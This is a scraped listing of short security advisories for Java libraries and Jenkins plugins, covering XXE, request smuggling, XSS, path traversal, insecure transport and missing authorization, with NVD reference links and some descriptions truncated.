It was discovered that the XmlUtils class in jbpmmigration performed expansion of external parameter entities while parsing XML files. A remote attacker could use this flaw to read files accessible to the user running the application server and, potent…
[io.undertow:undertow-core] Undertow vulnerable to Request Smuggling
In Undertow 2.x before 2.0.0.Alpha2, 1.4.x before 1.4.17.Final, and 1.3.x before 1.3.31.Final, it was found that the fix for CVE-2017-2666 was incomplete and invalid characters are still allowed in the query string and path parameters. This could be ex…
[org.elasticsearch.plugin:x-pack] Improper Privilege Management in X-Pack
The Reporting feature in X-Pack in versions prior to 5.5.2 and standalone Reporting plugin versions versions prior to 2.4.6 had an impersonation vulnerability. A user with the reporting_user role could execute a report with the permissions of another r…
[com.sonyericsson.jenkins.plugins.bfa:build-failure-analyzer] Cross-site Scripting in Jenkins Build Failure Analyzer plugin
Cross-site scripting (XSS) vulnerability in the Build Failure Analyzer plugin before 1.16.0 in Jenkins allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
References
https://nvd.nist.gov/vuln/detail/CVE-2016-49…
[org.apache.atlas:atlas-common] Cross-site Scripting in Apache Atlas
Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to Stored Cross-Site Scripting in the edit-tag functionality.
References
https://nvd.nist.gov/vuln/detail/CVE-2017-3151
https://lists.apache.org/thread.html/4a4fef91e067…
[org.apache.sling:org.apache.sling.xss] Cross site scripting in Apache Sling
In the XSS Protection API module before 1.0.12 in Apache Sling, the encoding done by the XSSAPI.encodeForJSString() method is not restrictive enough and for some input patterns allows script tags to pass through unencoded, leading to potential XSS vuln…
[org.apache.myfaces.core:myfaces-impl] Path Traversal in Apache MyFaces
Multiple directory traversal vulnerabilities in MyFaces JavaServer Faces (JSF) in Apache MyFaces Core 2.0.x before 2.0.12 and 2.1.x before 2.1.6 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) ln parameter to faces/javax.fa…
[org.gradle:gradle-core] Insecure transport protocol in Gradle
Gradle versions from 1.4 to 5.3.1 use an insecure HTTP URL to download dependencies when the built-in JavaScript or CoffeeScript Gradle plugins are used. Dependency artifacts could have been maliciously compromised by a MITM attack against the ajax.goo…
[org.jvnet.hudson.plugins:hipchat] Jenkins HipChat Plugin allows attackers with Overall/Read access to obtain credential IDs
An improper authorization vulnerability exists in Jenkins HipChat Plugin 2.2.0 and earlier in HipChatNotifier.java that allows attackers with Overall/Read access to obtain credentials IDs for credentials stored in Jenkins. As of version 2.2.1, an enume…
[io.jenkins.blueocean:blueocean] Missing Authorization in Jenkins Blue Ocean Plugin
The optional Run/Artifacts permission can be enabled by setting a Java system property. Blue Ocean did not check this permission before providing access to archived artifacts, Item/Read permission was sufficient.
References
https://nvd.nist.gov/vuln/d…